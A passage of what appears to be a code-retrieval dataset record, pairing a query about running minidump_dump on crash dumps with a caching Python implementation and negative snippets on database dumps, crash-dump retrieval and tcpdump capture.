os.path.abspath(os.path.join(os.path.dirname(sys._getframe(1).f_code.co_filename), filename))", "def getRootPath():\n return '/'.join(__file__.split('/')[:-4]) # Path of this file with pagebot/__init__.py(c) removed.", "def bin_path(self) -> Path:\n return self._root_path / \"stefan-on-software-api-client\" / \"bin\"", "def program_dir():\n if (Win32() and (hasattr(sys, 'frozen') or imp.is_frozen('__main__'))):\n # running from exe generated by py2exe\n return os.path.dirname(sys.executable)\n else:\n return sys.path[0]\n # return os.path.dirname(os.path.abspath(sys.argv[0]))", "def get_exe_path(exe):\n for type_, path in get_possible_paths():\n full_path = os.path.join(path, exe)\n if os.path.exists(full_path):\n if type_ == 'bundled':\n bundled_warning()\n return full_path\n return None", "def acquire_package_directory():\n top_plugin_dir = os.path.realpath(os.path.join(os.getcwd(),\n os.path.dirname(__file__)))\n expected_package_dir = '/extras/MockApp'\n app_dir = top_plugin_dir + expected_package_dir\n return app_dir", "def bootstrap_binary(self):\n return os.path.join(self.build_dir, \"bootstrap\", \"debug\", \"bootstrap\")", "def get_kernel_path():\n path = \"/\".join(os.path.dirname(os.path.realpath(__file__)).split('/')[:-1])\n return path+'/src/'", "def get_root():\n\n return 'data/simulators/mg1'", "def get_scratch_dir():\n scratch_dir = os.path.join(get_repo_dir(), \"target\", \"compat-check\")\n if not os.path.exists(scratch_dir):\n os.makedirs(scratch_dir)\n return scratch_dir", "def getmp_srcdir():\n return os.path.join(getmp_rootdir(), 'src')", "def get_packaging_pictures_path(self):\n file_path = os.path.dirname(__file__)\n file_path = os.path.join(file_path, \"Packaging\")\n return file_path", "def get_executable_path(py_binary_name):\n\n if os.name == 'nt':\n py_binary_name += '.exe'\n manifest_file = os.path.join(FLAGS.test_srcdir, 'MANIFEST')\n workspace_name = os.environ['TEST_WORKSPACE']\n manifest_entry = '{}/{}'.format(workspace_name, py_binary_name)\n with open(manifest_file, 'r') as manifest_fd:\n for line in manifest_fd:\n tokens = line.strip().split(' ')\n if len(tokens) != 2:\n continue\n if manifest_entry == tokens[0]:\n return tokens[1]\n raise RuntimeError(\n 'Cannot locate executable path for {}, MANIFEST file: {}.'.format(\n py_binary_name, manifest_file))\n else:\n # NOTE: __file__ may be .py or .pyc, depending on how the module was\n # loaded and executed.\n path = __file__\n\n # Use the package name to find the root directory: every dot is\n # a directory, plus one for ourselves.\n for _ in range(__name__.count('.') + 1):\n path = os.path.dirname(path)\n\n root_directory = path\n return os.path.join(root_directory, py_binary_name)", "def _blink_base(self):\n module_path = self._filesystem.path_to_module(self.__module__)\n tools_index = module_path.rfind('tools')\n assert tools_index != -1, 'could not find location of this checkout from %s' % module_path\n return self._filesystem.normpath(module_path[0:tools_index - 1])", "def this_folder():\n if getattr(sys, 'frozen', False):\n # The application is frozen\n return os.path.dirname(sys.executable)\n else:\n # The application is not frozen\n return os.path.dirname(__file__)", "def path(self):\n path = os.path.join(self.base_dir, self.store().replace(' ', '_'), self.package_name())\n return os.path.abspath(path)", "def FindBinary(module_space, bin_name):\n if not bin_name:\n return None\n if bin_name.startswith(\"//\"):\n # Case 1: Path is a label. Not supported yet.\n raise AssertionError(\n \"Bazel does not support execution of Python interpreters via labels yet\"\n )\n elif os.path.isabs(bin_name):\n # Case 2: Absolute path.\n return bin_name\n # Use normpath() to convert slashes to os.sep on Windows.\n elif os.sep in os.path.normpath(bin_name):\n # Case 3: Path is relative to the repo root.\n return os.path.join(module_space, bin_name)\n else:\n # Case 4: Path has to be looked up in the search path.\n return SearchPath(bin_name)", "def symbol_to_path(symbol, base_dir=\"data\"):\n return os.path.join(base_dir, \"{}.csv\".format(str(symbol)))", "def symbol_to_path(symbol, base_dir=\"data\"):\n return os.path.join(base_dir, \"{}.csv\".format(str(symbol)))", "def BrocDir(self):\n return os.path.dirname(os.path.join(self._module.workspace, self._module.broc_cvspath))", "def outputdir():\n return __OUTPUT_DIR__", "def location(self):\n\n p = os.path.abspath(__file__)\n pathSP = os.path.split(p)\n return pathSP" ]
[ "0.6687989", "0.668011", "0.6666962", "0.6321019", "0.63035196", "0.6107489", "0.6062449", "0.6049191", "0.6031628", "0.6012374", "0.5988652", "0.5959031", "0.5932072", "0.5915141", "0.59118515", "0.59096825", "0.5886469", "0.5836009", "0.58122456", "0.58107346", "0.58003944", "0.57813776", "0.57147396", "0.5705924", "0.5696492", "0.5696148", "0.569374", "0.5686065", "0.5680613", "0.56766015", "0.56746584", "0.5664329", "0.5664138", "0.56620914", "0.5661892", "0.5657953", "0.5652321", "0.5651023", "0.56498504", "0.5644514", "0.5640601", "0.56326944", "0.5625382", "0.56225914", "0.56204456", "0.5617417", "0.5616858", "0.56001985", "0.5598852", "0.55886245", "0.55847615", "0.5573665", "0.556784", "0.5557073", "0.55442065", "0.5540504", "0.5535553", "0.5533281", "0.55318785", "0.55204254", "0.55154485", "0.55065715", "0.5502768", "0.55020034", "0.5495792", "0.5493137", "0.5486147", "0.54791856", "0.54747534", "0.5455119", "0.5452504", "0.5450197", "0.5443747", "0.54425234", "0.5437902", "0.54371506", "0.5437046", "0.5436472", "0.541752", "0.54126054", "0.54085606", "0.54071206", "0.5405715", "0.5403471", "0.54034567", "0.54009455", "0.5400812", "0.5399069", "0.53893083", "0.53857523", "0.5385652", "0.53828716", "0.5378779", "0.5373533", "0.5373151", "0.5361074", "0.5361074", "0.5360126", "0.53598905", "0.5358987" ]
0.7879615
0
Runs minidump_dump on the given minidump. Caches the result for reuse.
def _GetMinidumpDumpOutput(self, minidump): if minidump in self._minidump_dump_output: logging.debug('Returning cached minidump_dump output for %s', minidump) return self._minidump_dump_output[minidump] dumper_path = local_first_binary_manager.GetInstance().FetchPath( 'minidump_dump') if not os.access(dumper_path, os.X_OK): logging.warning('Cannot run minidump_dump because %s is not found.', dumper_path) return None # Using subprocess.check_output with stdout/stderr mixed can result in # errors due to log messages showing up in the minidump_dump output. So, # use Popen and combine into a single string afterwards. p = subprocess.Popen( [dumper_path, minidump], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = p.communicate() stdout = stdout + '\n' + stderr if p.returncode != 0: # Dumper errors often do not affect stack walkability, just a warning. # It's possible for the same stack to be symbolized multiple times, so # add a timestamp suffix to prevent artifact collisions. now = datetime.datetime.now() suffix = now.strftime('%Y-%m-%d-%H-%M-%S') artifact_name = 'dumper_errors/%s-%s' % ( os.path.basename(minidump), suffix) logging.warning( 'Reading minidump failed, but likely not actually an issue. Saving ' 'output to artifact %s', artifact_name) artifact_logger.CreateArtifact(artifact_name, stdout) if stdout: self._minidump_dump_output[minidump] = stdout return stdout
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def testPullMinidumps(self):\n def GetDumpLocation(_=None):\n return '/sdcard/dumps/'\n\n platform_backend = self._browser_backend.platform_backend\n time_offset = platform_backend.GetDeviceHostClockOffset()\n platform_backend.GetDumpLocation = GetDumpLocation\n remote_path = posixpath.join(GetDumpLocation(), 'Crashpad', 'pending')\n self._browser_backend.device.RunShellCommand(['mkdir', '-p', remote_path])\n # Android's implementation of \"touch\" doesn't support setting time via\n # Unix timestamps, only via dates, which are affected by timezones. So,\n # figure out what the device's timestamp for January 2nd, 1970 is and use\n # that to calculate the expected local timestamp. January 2nd is used\n # instead of January 1st so that we can't get accidentally get a negative\n # timestamp if the host-device clock offset is negative.\n remote_dump_file = posixpath.join(remote_path, 'test_dump')\n self._browser_backend.device.RunShellCommand(\n ['touch', '-d', '1970-01-02T00:00:00', remote_dump_file])\n device_mtime = self._browser_backend.device.RunShellCommand(\n ['stat', '-c', '%Y', remote_dump_file], single_line=True)\n device_mtime = int(device_mtime.strip())\n try:\n self._browser_backend.PullMinidumps()\n finally:\n self._browser_backend.device.RemovePath(GetDumpLocation(), recursive=True)\n\n local_path = os.path.join(\n self._browser_backend._tmp_minidump_dir, 'test_dump')\n self.assertTrue(os.path.exists(local_path))\n self.assertEqual(os.path.getmtime(local_path), device_mtime - time_offset)", "def dumbcache_dump(self, cache_dir=r'data\\cache'):\n obj = self\n\n DUMBCACHE = os.path.join(r'..', cache_dir, r'br_store.dmp')\n with open(DUMBCACHE, 'wb') as f:\n pkl.dump(obj, f)", "def testPullMinidumpsLockedFilesIgnored(self):\n def GetDumpLocation(_=None):\n return '/sdcard/dumps/'\n\n platform_backend = self._browser_backend.platform_backend\n platform_backend.GetDumpLocation = GetDumpLocation\n remote_path = posixpath.join(GetDumpLocation(), 'Crashpad', 'pending')\n self._browser_backend.device.RunShellCommand(['mkdir', '-p', remote_path])\n remote_dump_file = posixpath.join(remote_path, 'test_dump')\n remote_locked_dump_file = posixpath.join(remote_path, 'locked_dump')\n self._browser_backend.device.RunShellCommand(\n ['touch', remote_dump_file])\n self._browser_backend.device.RunShellCommand(\n ['touch', remote_locked_dump_file])\n self._browser_backend.device.RunShellCommand(\n ['touch', remote_locked_dump_file + '.lock'])\n try:\n self._browser_backend.PullMinidumps()\n finally:\n self._browser_backend.device.RemovePath(GetDumpLocation(), recursive=True)\n\n local_path = os.path.join(\n self._browser_backend._tmp_minidump_dir, 'test_dump')\n self.assertTrue(os.path.exists(local_path))\n local_path = os.path.join(\n self._browser_backend._tmp_minidump_dir, 'locked_dump')\n self.assertFalse(os.path.exists(local_path))", "def disasm_dump(bin, addr):\n return cache.access((bin,addr), lambda x: disasm_work(*x))", "def testPullMinidumpsOnlyNew(self):\n def GetDumpLocation(_=None):\n return '/sdcard/dumps/'\n\n local_old_dump_path = os.path.join(\n self._browser_backend._tmp_minidump_dir, 'old_dump')\n with open(local_old_dump_path, 'w'):\n pass\n old_dump_time = os.stat(local_old_dump_path).st_mtime\n\n platform_backend = self._browser_backend.platform_backend\n platform_backend.GetDumpLocation = GetDumpLocation\n remote_path = posixpath.join(GetDumpLocation(), 'Crashpad', 'pending')\n self._browser_backend.device.RunShellCommand(['mkdir', '-p', remote_path])\n remote_dump_file = posixpath.join(remote_path, 'new_dump')\n self._browser_backend.device.RunShellCommand(\n ['touch', '-d', '1970-01-02T00:00:00', remote_dump_file])\n remote_dump_file = posixpath.join(remote_path, 'old_dump')\n self._browser_backend.device.RunShellCommand(\n ['touch', '-d', '1970-01-02T00:00:00', remote_dump_file])\n\n try:\n self._browser_backend.PullMinidumps()\n finally:\n self._browser_backend.device.RemovePath(GetDumpLocation(), recursive=True)\n\n local_new_dump_path = os.path.join(\n self._browser_backend._tmp_minidump_dir, 'new_dump')\n self.assertTrue(os.path.exists(local_new_dump_path))\n self.assertTrue(os.path.exists(local_old_dump_path))\n # A changed mtime would mean that the dump was re-pulled\n self.assertEqual(os.stat(local_old_dump_path).st_mtime, old_dump_time)", "def test_dump_calls_pg_dump(mocker):\n\tmocker.patch('subprocess.Popen')\n\tassert pgdump.dump(url)\n\tsubprocess.Popen.assert_called_with(['pg_dump', url], stdout=subprocess.PIPE)", "def PullDumps(self, host_dir):\n # The device/emulator's clock might be off from the host, so calculate an\n # offset that can be added to the host time to get the corresponding device\n # time.\n # The offset is (device_time - host_time), so a positive value means that\n # the device clock is ahead.\n time_offset = self.GetDeviceHostClockOffset()\n\n stdout, _ = self.RunCmdOnDevice([\n 'ls', '-1',\n cmd_helper.SingleQuote(self.ExpandUser(self.MINIDUMP_DIR))\n ])\n device_dumps = stdout.splitlines()\n for dump_filename in device_dumps:\n host_path = os.path.join(host_dir, dump_filename)\n # Skip any ignored files since they're not useful and could be deleted by\n # the time we try to pull them.\n if _IsIgnoredFileType(dump_filename):\n continue\n if os.path.exists(host_path):\n continue\n device_path = cmd_helper.SingleQuote(\n posixpath.join(self.MINIDUMP_DIR, dump_filename))\n\n # Skip any directories that happen to be in the list.\n if self.IsDir(device_path):\n continue\n\n # Skip any files that have a corresponding .lock file, as that implies the\n # file hasn't been fully written to disk yet.\n device_lock_path = cmd_helper.SingleQuote(\n posixpath.join(self.MINIDUMP_DIR, dump_filename + '.lock'))\n if self.FileExistsOnDevice(device_lock_path):\n logging.debug('Not pulling file %s because a .lock file exists for it',\n device_path)\n continue\n try:\n self.GetFile(device_path, host_path)\n except Exception as e: # pylint: disable=broad-except\n logging.error('Failed to get file %s: %s', device_path, e)\n continue\n # Set the local version's modification time to the device's.\n stdout, _ = self.RunCmdOnDevice(\n ['ls', '--time-style', '+%s', '-l', device_path])\n stdout = stdout.strip()\n # We expect whitespace-separated fields in this order:\n # mode, links, owner, group, size, mtime, filename.\n # Offset by the difference of the device and host clocks.\n device_mtime = int(stdout.split()[5])\n host_mtime = device_mtime - time_offset\n os.utime(host_path, (host_mtime, host_mtime))", "def clean_dump(self, dump_filename):\n # Read dump file generated by mysqldump\n with open(dump_filename, \"r\") as dump_file:\n dump_text = regroup_inserts(dump_file.read())\n\n with open(dump_filename, \"w\") as dump_file:\n # add the use database statement at the beginning\n dump_file.write(\"USE {};\\n\".format(self.database_name))\n\n # overwrite the dump with the new single statement version\n dump_file.write(dump_text)", "def run_dump(self, expanded, unexpanded) : \n\t\tif len(expanded) < 2 :\n\t\t\treturn self.errormessage(\"Needs at least a destination directory and one object id to dump\")\n\t\tdestination = os.path.normpath(os.path.expanduser(expanded[0])) # in case there's a ~username\n\t\tif not os.path.isdir(destination) :\n\t\t\treturn self.errormessage(\"%s is not a directory\" % destination)\n\t\tstatus = 0\n\t\tfor arg in expanded[1:] :\n\t\t\tobject = self.toObject(self.__context, arg)\n\t\t\tif object is None :\n\t\t\t\tstatus = status + self.errormessage(\"Object %s doesn't exist\" % arg)\n\t\t\telif not self.HasPerms(object, 'View management screens') :\n\t\t\t\tstatus = status - 1\n\t\t\telif not hasattr(object, \"document_src\") or not callable(object.document_src) :\n\t\t\t\tstatus = status + self.errormessage(\"Doesn't know how to dump object %s\" % arg)\n\t\t\telse :\n\t\t\t\tfname = os.path.join(destination, object.getId())\n\t\t\t\ttry :\n\t\t\t\t\tfout = open(fname, \"wb\")\n\t\t\t\t\tfout.write(object.document_src())\n\t\t\t\t\tfout.close()\n\t\t\t\t\tself.htmlmessage(\"Object %s dumped to server as %s\" % (self.ObjectPath(object), fname))\n\t\t\t\texcept IOError, msg :\n\t\t\t\t\tstatus = status + self.errormessage('Error %s, occured while dumping %s' % (msg, arg))\n\t\treturn status", "def testPullMinidumpsLockFilesIgnored(self):\n def GetDumpLocation(_=None):\n return '/sdcard/dumps/'\n\n platform_backend = self._browser_backend.platform_backend\n platform_backend.GetDumpLocation = GetDumpLocation\n remote_path = posixpath.join(GetDumpLocation(), 'Crashpad', 'pending')\n self._browser_backend.device.RunShellCommand(['mkdir', '-p', remote_path])\n remote_dump_file = posixpath.join(remote_path, 'test_dump')\n remote_lock_file = posixpath.join(remote_path, 'test_file.lock')\n self._browser_backend.device.RunShellCommand(\n ['touch', remote_dump_file])\n self._browser_backend.device.RunShellCommand(\n ['touch', remote_lock_file])\n try:\n self._browser_backend.PullMinidumps()\n finally:\n self._browser_backend.device.RemovePath(GetDumpLocation(), recursive=True)\n\n local_path = os.path.join(\n self._browser_backend._tmp_minidump_dir, 'test_dump')\n self.assertTrue(os.path.exists(local_path))\n local_path = os.path.join(\n self._browser_backend._tmp_minidump_dir, 'test_file.lock')\n self.assertFalse(os.path.exists(local_path))", "def do_disassemble(self, args):\n if len(args) != 0:\n args = args.split(' ')\n self.u_start = self.ParseAddressExpr(args[0])\n self.u_size = self.ParseAddressExpr(args[1]) if len(args) > 1 else 0x20\n skip = False\n else:\n # Skip the first instruction if we reuse the last address.\n skip = True\n\n if not self.reader.IsValidAddress(self.u_start):\n print(\"Address %s is not contained within the minidump!\" % (\n self.reader.FormatIntPtr(self.u_start)))\n return\n lines = self.reader.GetDisasmLines(self.u_start, self.u_size)\n if len(lines) == 0:\n print(\"Address %s could not be disassembled!\" % (\n self.reader.FormatIntPtr(self.u_start)))\n print(\" Could not disassemble using %s.\" % OBJDUMP_BIN)\n print(\" Pass path to architecture specific objdump via --objdump?\")\n return\n for line in lines:\n if skip:\n skip = False\n continue\n print(FormatDisasmLine(self.u_start, self.heap, line))\n # Set the next start address = last line\n self.u_start += lines[-1][0]\n print()", "def split_debug(src, objcopy=None, objdump=None):\n if objcopy is None:\n objcopy = \"objcopy\"\n if objdump is None:\n objdump = \"objdump\"\n if not contains_debug_info(src, objdump=objdump):\n ui.info(\"-- Already stripped\", src)\n return\n src_stat = os.stat(src)\n dirname, basename = os.path.split(src)\n debug_dir = os.path.join(dirname, \".debug\")\n qisys.sh.mkdir(debug_dir)\n dest = os.path.join(src, debug_dir, basename)\n to_run = list()\n to_run.append([objcopy, \"--only-keep-debug\", src, dest])\n to_run.append([objcopy,\n \"--strip-debug\",\n \"--strip-unneeded\",\n \"--add-gnu-debuglink=%s\" % dest,\n src])\n try:\n for cmd in to_run:\n qisys.command.check_output(cmd, stderr=subprocess.STDOUT)\n ui.info(\"-- Debug info extracted for\", src)\n except qisys.command.CommandFailedException as e:\n ui.error(\"Error while Extracting package debug for %s\" % src)\n ui.error(str(e))\n # After the commands have run, utime of the file has changed, causing\n # cmake to re-install the libraries. Which is not cool ...\n # So set back mtime to its previous value:\n os.utime(src, (src_stat.st_atime, src_stat.st_mtime))", "def test_execute_dump_site_transaction(self):\n\n instruction = Instruction(\"dump(3)\")\n\n with std_out() as (out, err):\n self.transaction_manager.execute(instruction)\n\n output = out.getvalue().strip()\n self.assertEqual(output, \"{'x14': { x14: 140 }, 'x18': { x18: 180 }, 'x10': { x10: 100 }, 'x8': { x8: 80 }, 'x16': { x16: 160 }, 'x2': { x2: 20 }, 'x12': { x12: 120 }, 'x6': { x6: 60 }, 'x20': { x20: 200 }, 'x4': { x4: 40 }}\")", "def backup_dump(self):\n errors = Queue.Queue()\n threads = []\n for host in self.shards:\n t = threading.Thread(target=host.mongodump, args=(errors,))\n threads.append(t)\n if self.config_server is not None:\n t = threading.Thread(target=self.config_server.mongodump, args=(errors,))\n threads.append(t)\n for thread in threads:\n thread.start()\n for thread in threads:\n thread.join()\n if not errors.empty():\n # We don't really care for all errors, so just through the first one\n raise Exception(errors.get())", "def clean_dump(filename):\n from .utils import clean_dump as clean\n click.echo('Starting to cleaning {}'.format(filename))\n clean(filename)\n click.echo('Finished cleaning {}'.format(filename))", "def PullDumps(self, host_dir):\n # The device/emulator's clock might be off from the host, so calculate an\n # offset that can be added to the host time to get the corresponding device\n # time.\n # The offset is (device_time - host_time), so a positive value means that\n # the device clock is ahead.\n time_offset = self.GetDeviceHostClockOffset()\n\n stdout, _ = self.RunCmdOnDevice(\n ['ls', '-1', cmd_helper.SingleQuote(self.CROS_MINIDUMP_DIR)])\n device_dumps = stdout.splitlines()\n for dump_filename in device_dumps:\n host_path = os.path.join(host_dir, dump_filename)\n # Skip any ignored files since they're not useful and could be deleted by\n # the time we try to pull them.\n if _IsIgnoredFileType(dump_filename):\n continue\n if os.path.exists(host_path):\n continue\n device_path = cmd_helper.SingleQuote(\n posixpath.join(self.CROS_MINIDUMP_DIR, dump_filename))\n # Skip any directories that happen to be in the list.\n stdout, _ = self.RunCmdOnDevice(['test', '-f', device_path, '&&',\n 'echo', 'true', '||', 'echo', 'false'])\n if 'false' in stdout:\n continue\n # Skip any files that have a corresponding .lock file, as that implies the\n # file hasn't been fully written to disk yet.\n device_lock_path = device_path + '.lock'\n if self.FileExistsOnDevice(device_lock_path):\n logging.debug('Not pulling file %s because a .lock file exists for it',\n device_path)\n continue\n try:\n self.GetFile(device_path, host_path)\n except Exception as e: # pylint: disable=broad-except\n logging.error('Failed to get file %s: %s', device_path, e)\n continue\n # Set the local version's modification time to the device's.\n stdout, _ = self.RunCmdOnDevice(\n ['ls', '--time-style', '+%s', '-l', device_path])\n stdout = stdout.strip()\n # We expect whitespace-separated fields in this order:\n # mode, links, owner, group, size, mtime, filename.\n # Offset by the difference of the device and host clocks.\n device_mtime = int(stdout.split()[5])\n host_mtime = device_mtime - time_offset\n os.utime(host_path, (host_mtime, host_mtime))", "def dump(self):\n self.dumpInit.emit()\n\n worker = DumpThread()\n thread = QtCore.QThread(self)\n self.__thread_maps['dump'] = [thread, worker]\n worker.moveToThread(thread)\n\n worker.dumpSig.connect(self.dumpSig)\n worker.dumpDone.connect(self.dumpDone)\n thread.started.connect(worker.dump)\n\n thread.start()", "def test_dump_call_pgdump(mocker):\n mocker.patch('subprocess.Popen')\n assert pgdump.dump(url)\n subprocess.Popen.assert_called_with(['pg_dump' , url] , stdout=subprocess.PIPE)", "def do_before_dump(self):\n self.checksummer.prepare_checksums()", "def dump(self, dump_path: str):\n if self.parsed_data is None:\n raise ValueError(f'{self.resource_name} -- no parsed data to dump '\n f'(hint: call `parse` method first)')\n dump(path=dump_path, data=self.parsed_data, resource_name=self.resource_name)", "def includeInDump(self):\n pass", "def dumpMetaServerChunkMap(metaServer, dumpMetaFile, defaultMetaFile, defaultCheckPoint):\n\n # Get latest checkpoint file\n # Gzip latest file and copy it locally\n print \"Compressing latest checkpoint %s on %s\" % (defaultCheckPoint, metaServer.node)\n if not os.path.exists(\"./checkpointdir\"):\n command = \"mkdir ./checkpointdir\"\n os.system(command)\n command = \"ssh -o StrictHostKeyChecking=no %s gzip -c %s > ./checkpointdir/latest.gz\" % (metaServer.node, defaultCheckPoint)\n os.system(command)\n\n #print \"Copying latest checkpoint file %s.gz\" % defaultCheckPoint\n #command = \"scp -o StrictHostKeyChecking=no %s:%s.gz ./checkpointdir\" % (metaServer.node, defaultCheckPoint)\n #os.system(command)\n\n print \"Uncompressing latest checkpoint ./checkpointdir/latest.gz\" \n command = \"gunzip -f ./checkpointdir/latest.gz\"\n os.system(command)\n \n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((metaServer.node, metaServer.port))\n req = \"DUMP_CHUNKTOSERVERMAP\\r\\nVersion: KFS/1.0\\r\\nCseq: 1\\r\\n\\r\\n\"\n sock.send(req)\n sockIn = sock.makefile('r')\n for line in sockIn:\n if line.find('OK') == 0:\n continue\n if line.find('Cseq') == 0:\n continue\n if line.find('Status') == 0:\n continue\n if line.find('\\r\\n') == 0:\n break\n sock.close()\n \n # Gzip the file and scp over to dumMetaFile.gz and extract it\n print \"Compressing chunk map dump %s on %s\" % (defaultMetaFile, metaServer.node)\n command = \"ssh -o StrictHostKeyChecking=no %s gzip -f %s\" % (metaServer.node, defaultMetaFile)\n os.system(command)\n print \"Copying chunk map dump %s.gz to %s.gz\" % (defaultMetaFile, dumpMetaFile)\n command = \"scp -o StrictHostKeyChecking=no %s:%s.gz %s.gz\" % (metaServer.node, defaultMetaFile, dumpMetaFile)\n os.system(command)\n print \"Uncompressing chunk map dump %s.gz\" % (dumpMetaFile)\n command = \"gunzip -f %s.gz\" % dumpMetaFile\n os.system(command)\n\n print \"Creating symlink chunkmap.txt to %s\" % (dumpMetaFile)\n command = \"rm chunkmap.txt\"\n os.system(command)\n command = \"ln -s %s chunkmap.txt\" % (dumpMetaFile)\n os.system(command)", "def dump():\n global CACHE\n return CACHE", "def memory(kdump_memory):\n config_db = ConfigDBConnector()\n if config_db is not None:\n config_db.connect()\n config_db.mod_entry(\"KDUMP\", \"config\", {\"memory\": kdump_memory})", "def dumpMemory():\n libxml2mod.xmlDumpMemory()", "def pump_and_dump(func, article_id, start, end, dump_dir):\n \n data = func(article_id, start, end)\n \n dump_dir = dump_dir\n ref = start[:16] + '--' + end[:16] + '--' + 'threadtemp'\n file = dump_dir +'/' + ref + '.pickle'\n\n with open(file, 'wb') as f:\n pickle.dump(data, f)", "def dumbcache_load(cache_dir=r'data\\cache'):\n DUMBCACHE = os.path.join(r'..', cache_dir, r'br_store.dmp')\n with open(DUMBCACHE, 'rb') as f:\n return pkl.load(f)", "def genDump(exePath,inputDict,outputDict):\n paramFile = path.join(path.dirname(inputDict),'damo.par')\n with open(paramFile,'w') as f:\n f.write('DUMP'+'\\n')\n f.write(inputDict+'\\n')\n f.write(outputDict)\n runDamocles(exePath, paramFile)\n remove(paramFile)", "def dump(args):\n if args.dump_command == \"trace\":\n _dump_trace(args)\n elif args.dump_command == \"checkpoint\":\n _dump_checkpoint(args)\n elif args.dump_command == \"config\":\n _dump_config(args)\n else:\n raise ValueError()", "def daily(dbname, as_username='postgres'):\n\n filename = '{dbname}-{indate}.dump.sql'.format(\n dbname=dbname, indate=datetime.now().strftime('%Y-%m-%d'))\n backup_daily_dir = os.path.join(BACKUPS_STORE_DIR, 'daily')\n if not os.path.isdir(backup_daily_dir):\n os.makedirs(backup_daily_dir)\n\n dumpfile = execute_pgdump(dbname, as_username)\n dst = os.path.join(backup_daily_dir, filename)\n logger.info('moving {src} into {dst}'.format(src=dumpfile, dst=dst))\n shutil.move(dumpfile, dst)\n logger.info('{dst} has a size of {size} bytes.'.format(\n dst=dst, size=get_file_size(dst)))", "def mmfile(filename, dump, size):\n f = open(filename, 'w')\n filesize = 0\n while(filesize < size):\n f.write(dump)\n filesize = os.path.getsize(filename)\n return filesize", "def safe_dump(filename: str, data, use_lock=True, use_temp=True, lock_timeout=10) -> bool:\n temp_fname = 'temp.' + filename\n lock_fname = 'lock.' + filename\n\n def safe_dump_inner():\n if use_temp:\n dump(temp_fname, data)\n os.replace(temp_fname, filename)\n return True\n else:\n return dump(temp_fname, data)\n\n if use_lock:\n with FileLock(lock_fname, lock_timeout) as flock:\n if flock.is_locked:\n return safe_dump_inner()\n else:\n logger.warning('Cannot lock the file: {}.'.format(filename))\n return False\n else:\n return safe_dump_inner()", "def do_before_job(self, dump_items):\n self.runinfo.save_dump_runinfo(\n RunInfo.report_dump_runinfo(dump_items))", "def __init__(self, dump_finder, build_dir, symbols_dir=None):\n # Map from minidump path (string) to minidump_dump output (string).\n self._minidump_dump_output = {}\n # Map from minidump path (string) to the directory that should be used when\n # looking for symbol binaries (string).\n self._minidump_symbol_binaries_directories = {}\n # We use the OS/arch of the host, not the device.\n super(AndroidMinidumpSymbolizer, self).__init__(\n platform.system().lower(), platform.machine(), dump_finder, build_dir,\n symbols_dir=symbols_dir)", "def run_backup():\n host = re.search(\"([\\w.-]+)[:]?\", env.host).group()\n date = time.strftime('%Y%m%d%H%M%S')\n fname = '%(host)s-backup-%(date)s.gz' % {'date': date, 'host': host}\n green(\"Ingrese la contraseña de la clave privada local.\")\n sudo(\"pg_dump kine | gzip > /tmp/%s\" % fname, user=\"postgres\")\n get(\"/tmp/%s\" % fname, os.path.join(backup_dir, fname))\n sudo(\"rm /tmp/%s\" % fname, user=\"postgres\")", "def runDump(self, listDump):\n\n if isinstance(listDump, list) is False:\n raise KeyError(\"listDump must be a list\")\n\n logger.debug(\"listDump: %s\", listDump)\n\n commandService = Command()\n\n\n for dump in listDump:\n \n try:\n logger.info(\"Dumping %s/%s in %s\" % (dump['service']['stack']['name'], dump['service']['name'], dump['target_dir']))\n environments = \"\"\n for env in dump['environments']:\n environments += \" -e '%s'\" % env.replace(':', '=')\n \n \n if 'entrypoint' in dump:\n entrypoint = \"--entrypoint='%s'\" % dump['entrypoint']\n else:\n entrypoint = ''\n \n # Check if folder to receive dump exist, else create it\n if os.path.isdir(dump['target_dir']) is False:\n os.makedirs(dump['target_dir'])\n logger.debug(\"Create directory '%s'\", dump['target_dir'])\n else:\n logger.debug(\"Directory '%s' already exist\", dump['target_dir'])\n \n commandService.runCmd(\"docker pull %s\" % dump['image'])\n \n for command in dump['commands']:\n dockerCmd = \"docker run --rm %s -v %s:%s %s %s %s\" % (entrypoint, dump['target_dir'], dump['target_dir'], environments, dump['image'], command)\n commandService.runCmd(dockerCmd)\n logger.info(\"Dump %s/%s is finished\" % (dump['service']['stack']['name'], dump['service']['name']))\n \n except Exception as e:\n logger.error(\"Error appear when dump '%s/%s', skip : %s\" % (dump['service']['stack']['name'], dump['service']['name'], e.message))\n # Don't beack backup if somethink wrong\n pass", "def test_execute_dump_var_transaction(self):\n\n instruction = Instruction(\"dump(3)\")\n\n with std_out() as (out, err):\n self.transaction_manager.execute(instruction)\n\n output = out.getvalue().strip()\n self.assertEqual(output, \"{'x14': { x14: 140 }, 'x18': { x18: 180 }, 'x10': { x10: 100 }, 'x8': { x8: 80 }, 'x16': { x16: 160 }, 'x2': { x2: 20 }, 'x12': { x12: 120 }, 'x6': { x6: 60 }, 'x20': { x20: 200 }, 'x4': { x4: 40 }}\")", "def start_tcpdump(self):\n\t\tlog_file = os.path.join(self.cfg.file_log_dir,self.info[\"hash_md5\"]+\".pcap\")\n\t\tself.info[\"tcpdump_log_path\"] = log_file\n\t\tcmd = [\"/usr/sbin/tcpdump\", \"-iany\", \"-w\"+self.info[\"tcpdump_log_path\"], \"-c%d\"%(self.cfg.tcpdump_limit)]\n\t\tself.p_tcpdump = subprocess.Popen( cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\t\tself.log.info(\"tcpdump starts, logfile:%s\",self.info[\"tcpdump_log_path\"] )", "def xmlrpc_start(self, iface, expr, promisc=False, options=None):\n\n # Fail if there is already a tcpdump instance (started by us) running.\n if self._proc is not None and self._proc.active():\n error(\"Tcpdump already started!\")\n defer.returnValue(None)\n\n # FIXME: -Z?\n cmd = [self._daemon, \"-i\", iface, \"-w\", \"-\"]\n if options is not None and options['tcpdump_snaplen']:\n cmd.extend(['-s', str(options['tcpdump_snaplen'])])\n if not promisc:\n cmd.append(\"-p\")\n\n cmd.append(expr)\n dir = \"/mnt/scratch/%s/tcpdump\" % Node().getHostname()\n\n try:\n os.mkdir(dir)\n os.chmod(dir, 0777)\n except OSError, inst:\n if inst.errno != errno.EEXIST:\n error(inst)\n defer.returnValue(None)\n\n try:\n temp_fd, temp_file = mkstemp(suffix=\".pcap\", dir=dir)\n os.chmod(temp_file, 0666)\n except OSError, inst:\n error(inst)\n defer.returnValue(None)\n\n self._proc = _TcpdumpProtocol()\n debug(\"spawnProcess: %s\" %cmd)\n reactor.spawnProcess(self._proc, self._daemon, args = 